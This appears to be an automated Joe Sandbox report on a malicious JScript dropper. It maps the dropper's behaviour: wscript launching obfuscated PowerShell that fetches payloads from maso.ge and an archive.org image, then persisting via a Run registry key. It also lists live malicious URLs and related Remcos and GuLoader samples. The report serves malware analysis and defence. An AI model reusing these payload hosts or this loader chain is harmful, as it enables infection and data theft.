        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information22
        Scripting        		Valid Accounts11
        Command and Scripting Interpreter        		22
        Scripting        		11
        Process Injection        		21
        Virtualization/Sandbox Evasion        		OS Credential Dumping1
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		11
        Registry Run Keys / Startup Folder        		11
        Registry Run Keys / Startup Folder        		11
        Process Injection        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		2
        Obfuscated Files or Information        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Software Packing        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture3
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1491471 Sample: 15514541_Doc_Sub(C-A0893)10... Startdate: 12/08/2024 Architecture: WINDOWS Score: 100 30 ia601606.us.archive.org 2->30 32 maso.ge 2->32 36 Multi AV Scanner detection for domain / URL 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus detection for URL or domain 2->40 42 7 other signatures 2->42 10 wscript.exe 1 1 2->10         started        signatures3 process4 signatures5 44 JScript performs obfuscated calls to suspicious functions 10->44 46 Suspicious powershell command line found 10->46 48 Wscript starts Powershell (via cmd or directly) 10->48 50 4 other signatures 10->50 13 powershell.exe 7 10->13         started        process6 signatures7 52 Suspicious powershell command line found 13->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 13->54 16 powershell.exe 15 16 13->16         started        20 conhost.exe 13->20         started        process8 dnsIp9 26 ia601606.us.archive.org 207.241.227.86, 443, 49704 INTERNET-ARCHIVEUS United States 16->26 28 maso.ge 195.54.178.4, 443, 49705 ASDELTATELECOMRU Georgia 16->28 34 Creates autostart registry keys with suspicious values (likely registry only malware) 16->34 22 cmd.exe 1 16->22         started        signatures10 process11 process12 24 conhost.exe 22->24         started       

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        15514541_Doc_Sub(C-A0893)10-08-2024.js11%ReversingLabs
        15514541_Doc_Sub(C-A0893)10-08-2024.js12%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        ia601606.us.archive.org0%VirustotalBrowse
        maso.ge14%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://oneget.orgX0%URL Reputationsafe
        https://aka.ms/pscore60%URL Reputationsafe
        https://aka.ms/pscore60%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://oneget.org0%URL Reputationsafe
        https://ia601606.us.arXzJ0%Avira URL Cloudsafe
        https://go.microsoft.co0%Avira URL Cloudsafe
        https://maso.ge/wp-admin/sky.txt100%Avira URL Cloudmalware
        http://maso.ge100%Avira URL Cloudmalware
        https://ia601606.us.archive.org/10/items/deathnote0%Avira URL Cloudsafe
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg100%Avira URL Cloudmalware
        https://maso.ge/wp-admin/sky.txt12%VirustotalBrowse
        https://go.microsoft.co1%VirustotalBrowse
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        https://ia601606.us.archive.org/10/items/deathnote0%VirustotalBrowse
        https://maso.ge100%Avira URL Cloudmalware
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg4%VirustotalBrowse
        http://ia601606.us.archive.org0%Avira URL Cloudsafe
        https://ia601606.us.archive.org0%Avira URL Cloudsafe
        https://github.com/Pester/Pester1%VirustotalBrowse
        https://maso.ge14%VirustotalBrowse
        http://maso.ge14%VirustotalBrowse
        https://ia601606.us.archive.org0%VirustotalBrowse
        http://ia601606.us.archive.org0%VirustotalBrowse

        Domains and IPs

        Download Network PCAP: filteredfull

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ia601606.us.archive.org
        		207.241.227.86
        		truetrueunknown
        maso.ge
        		195.54.178.4
        		truefalseunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://maso.ge/wp-admin/sky.txttrue
        • 12%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpgtrue
        • 4%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://ia601606.us.arXzJpowershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://go.microsoft.copowershell.exe, 00000002.00000002.2259432896.000001D3FED95000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://go.micropowershell.exe, 00000004.00000002.2178327964.000001C2010CE000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://maso.gepowershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        https://contoso.com/powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://oneget.orgXpowershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://aka.ms/pscore6powershell.exe, 00000002.00000002.2231182452.000001D38006D000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://aka.ms/pscore68powershell.exe, 00000002.00000002.2231182452.000001D38008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2231182452.000001D3800BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://ia601606.us.archive.org/10/items/deathnotepowershell.exe, 00000002.00000002.2231182452.000001D3807D8000.00000004.00000800.00020000.00000000.sdmptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://maso.gepowershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://ia601606.us.archive.orgpowershell.exe, 00000004.00000002.2178327964.000001C201634000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://oneget.orgpowershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://ia601606.us.archive.orgpowershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        195.54.178.4
        		maso.geGeorgia
        		51147ASDELTATELECOMRUfalse
        207.241.227.86
        		ia601606.us.archive.orgUnited States
        		7941INTERNET-ARCHIVEUStrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1491471
        Start date and time:2024-08-12 11:36:07 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 55s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:15514541_Doc_Sub(C-A0893)10-08-2024.js
        Detection:MAL
        Classification:mal100.expl.evad.winJS@9/5@2/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 18
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .js
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target powershell.exe, PID 5752 because it is empty
        • Execution Graph export aborted for target powershell.exe, PID 6800 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        05:37:03API Interceptor45x Sleep call for process: powershell.exe modified
        11:37:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.js
        11:37:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.js

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        195.54.178.4DHL_Korea_Tax_Invoice_6064457135pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
        • maso.ge/wp-admin/BxlrTaiWcRLrVqryLvLFQ251.bin
        Your Transport Plan has Changed - Maersk.vbsGet hashmaliciousRemcos, GuLoaderBrowse
        • maso.ge/wp-admin/adRrrfS129.bin
        BOOKING-CONFIRMATION-APYN1114809.vbsGet hashmaliciousRemcos, GuLoaderBrowse
        • maso.ge/wp-admin/LsUvkPnHSaqE215.bin
        CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
        • maso.ge/wp-admin/QKEXNRyGdkQDvPsnL253.bin
        DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
        • maso.ge/wp-admin/Egotist.snp
        207.241.227.86Return_shipping_label.jsGet hashmaliciousUnknownBrowse
          INVOICE.jsGet hashmaliciousStormKitty, XWormBrowse
            doc_1000050408072024.jsGet hashmaliciousRemcosBrowse
              SLIM00260423 LIM-AMS-BOM.jsGet hashmaliciousRemcosBrowse
                Offertopurchase.jsGet hashmaliciousStormKitty, XWormBrowse
                  Offertopurchase.jsGet hashmaliciousStormKitty, XWormBrowse
                    Arrival_Notice_10008616062024.jsGet hashmaliciousAgentTeslaBrowse
                      Payment Receipt.jsGet hashmaliciousStormKitty, XWormBrowse
                        SCAN_DOC_10008050314-2024.jsGet hashmaliciousUnknownBrowse
                          DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            maso.geDHL_Korea_Tax_Invoice_6064457135pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            Your Transport Plan has Changed - Maersk.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            BOOKING-CONFIRMATION-APYN1114809.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            Shipment-Receipt-4747474747747-DHL-EXPRESS.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            Shipment-Receipt-4747474747747-DHL-EXPRESS.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            PO#SI106-2402-05.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            BKGCONF-THD1914129-BKGCONF-THD1914129.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            ia601606.us.archive.orgReturn_shipping_label.jsGet hashmaliciousUnknownBrowse
                            • 207.241.227.86
                            INVOICE.jsGet hashmaliciousStormKitty, XWormBrowse
                            • 207.241.227.86
                            doc_1000050408072024.jsGet hashmaliciousRemcosBrowse
                            • 207.241.227.86
                            SLIM00260423 LIM-AMS-BOM.jsGet hashmaliciousRemcosBrowse
                            • 207.241.227.86
                            Offertopurchase.jsGet hashmaliciousStormKitty, XWormBrowse
                            • 207.241.227.86
                            Offertopurchase.jsGet hashmaliciousStormKitty, XWormBrowse
                            • 207.241.227.86
                            Arrival_Notice_10008616062024.jsGet hashmaliciousAgentTeslaBrowse
                            • 207.241.227.86
                            Payment Receipt.jsGet hashmaliciousStormKitty, XWormBrowse
                            • 207.241.227.86
                            SCAN_DOC_10008050314-2024.jsGet hashmaliciousUnknownBrowse
                            • 207.241.227.86
                            DHL-66445735750-DHL-66445735750-DHL-66445735750.jsGet hashmaliciousRemcosBrowse
                            • 207.241.227.86

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            INTERNET-ARCHIVEUSsolicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            Env#U00edo de Orden de Compra No. 00501.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            Return_shipping_label.jsGet hashmaliciousUnknownBrowse
                            • 207.241.227.86
                            Comprobante_98756.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            solicitud de cotizacion--98086.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            03286786476_formulario bancario.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            086786476_formulario bancario.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            factura B11-362329013.009.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            SecuriteInfo.com.Other.Malware-gen.15822.25652.xlsxGet hashmaliciousRemcosBrowse
                            • 207.241.232.154
                            74800comprobanteee factura B11-362329013.009.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 207.241.232.154
                            ASDELTATELECOMRUDHL_Korea_Tax_Invoice_6064457135pdf.vbeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            Your Transport Plan has Changed - Maersk.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            BOOKING-CONFIRMATION-APYN1114809.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            CARGO_DELAY_NOTICE_NEW_SHIPPING_SCHEDULE_AND_ETA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            DHL_Express_Shipment_Confirmation_Notification_904088477321.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            FEDEX-TNT-OVERDUE-UNPAID-INVOICE980055177854.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4
                            Shipment-Receipt-4747474747747-DHL-EXPRESS.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            Shipment-Receipt-4747474747747-DHL-EXPRESS.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            PO#SI106-2402-05.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            • 195.54.178.4
                            BKGCONF-THD1914129-BKGCONF-THD1914129.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 195.54.178.4

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eDSSd4xRvdt.exeGet hashmaliciousQuasarBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            Quote RF-E68-STD-094.pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            SecuriteInfo.com.Trojan.AutoIt.1430.4587.24786.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            http://pub-09a55f0b5ac14dbbbc79ab40abc0b630.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            https://datechde.com/Get hashmaliciousUnknownBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            https://awaisni.github.io/awais-1Get hashmaliciousHTMLPhisherBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            http://pub-cbaabd801f124c2480bfbff1f6a830e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            https://kyc-metamaskwallet.webhop.net/927618a1-19574-4cac-b653-8c6be681sd84x6c5/d7a54Get hashmaliciousPhisherBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            http://instagramexternalwebsite.rf.gd/Get hashmaliciousUnknownBrowse
                            • 195.54.178.4
                            • 207.241.227.86
                            http://zimbra87apoeee.000webhostapp.com/in2p3.htmlGet hashmaliciousUnknownBrowse
                            • 195.54.178.4
                            • 207.241.227.86

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1628158735648508
                            Encrypted:false
                            SSDEEP:3:NlllulF7///h:NllU
                            MD5:34C16D1FA50B565A72B382C978CB2D56
                            SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                            SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                            SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e................................................@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vpvyudc.1py.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2afxm2i.acr.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mplkwni5.f2l.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otpuytok.b1z.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            Static File Info

                            General

                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Entropy (8bit):3.766721509137304
                            TrID:
                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                            • MP3 audio (1001/1) 32.22%
                            • Lumena CEL bitmap (63/63) 2.03%
                            • Corel Photo Paint (41/41) 1.32%
                            File name:15514541_Doc_Sub(C-A0893)10-08-2024.js
                            File size:687'804 bytes
                            MD5:7877c30c23e5a9a156eec6305499f212
                            SHA1:e50c8c551b7f240ad228cbabf5f65f6f05e02059
                            SHA256:8ddfd33e477594cd5387654a8b6435e906c692c064ddc55422bb4d2fee08723b
                            SHA512:abff546ce49ed3f42084b90fc3d4e32ea0a9088929e5079b1c808894c8552072c1a2b90289f9d071f6f0281ca6da98ba31df6c4ed74531afdba2aa2499bfa87a
                            SSDEEP:12288:4qCO4seCDJoh8eX6aqpvR96FZIhVP0n7GWR31SRSoIon8JtNJncee2ztXD9Rk89Y:mHWl/3VuH8xYkT
                            TLSH:D6E4F75035EAB05CF1F36FA357ED62E98FBBB5622626512E7004034B4A62EC1CE51B73
                            File Content Preview:..v.a.r. .L.W.c.P.d.C.A.c.U.N.i.j.x.W.K.i.G.W.t.Z.f.K.f.e.p.b.o.G.U.a.S.k.A.U.W.L.L.K.G.a.R.P.i.Z.l.C.s.h.k.T.t.C.l.f.z.A.N.S.t.W.b.e.u.U.K.c.R.W.c.a.K.j.C.K.h.K.t.c.S.L.e.J.g.b.Z.J.x.S.G.q.L.C.a.G.s.u.L.g.G.m. .=. .".U.B.U.u.v.L.c.B.s.i.G.m.h.f.n.O.C.k.K

                            File Icon

                            Icon Hash:68d69b8bb6aa9a86

                            Network Behavior

                            Download Network PCAP: filteredfull

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
